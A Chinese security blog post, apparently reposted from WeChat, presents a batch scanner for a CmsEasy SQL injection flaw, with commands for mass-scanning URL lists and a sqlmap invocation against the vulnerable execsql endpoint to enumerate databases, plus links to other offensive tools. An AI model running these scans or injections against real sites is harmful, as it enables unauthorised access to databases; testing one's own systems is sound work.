CmsEasy SQL注入漏洞批量扫描工具

admin

102369
文章

87
评论

2023年4月26日10:15:29评论86 views字数 565阅读1分53秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01 工具介绍

CmsEasy SQL注入漏洞批量扫描工具。

0x02 安装与使用

1、单个url测试

python3 cmseasy_sql_scan.py -u http://127.0.0.1:1111

2、批量检测扫描结束后会在当前目录生成vuln.txt记录存在漏洞的url

python3 cmseasy_sql_scan.py -f url.txt

3、sql注入执行

python sqlmap.py -u "https://xxx.xxx.xxx.xxx/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" --dbs

CmsEasy SQL注入漏洞批量扫描工具

0x03 项目链接下载

https://github.com/MzzdToT/CmsEasy_sql

原文始发于微信公众号（Web安全工具库）：CmsEasy SQL注入漏洞批量扫描工具

左青龙
微信扫一扫

右白虎
微信扫一扫

CmsEasy SQL注入漏洞批量扫描工具

针对目标已知信息的字典生成工具

Swagger API Exploit 1.1

歪脖子技能树 - DY直播工具V1.0

dirsearch_bypass403:目录扫描+JS文件中提取URL和子域+403状态绕过+指纹识别工具

内网穿透工具 nc

开源、离线、免费商用的大模型知识库:Langchain-Chatchat

CS插件乱码

403绕过目录扫描工具

【GitHub精选】红蓝功防资料汇总

工具 | navgix

发表评论

在线咨询

微信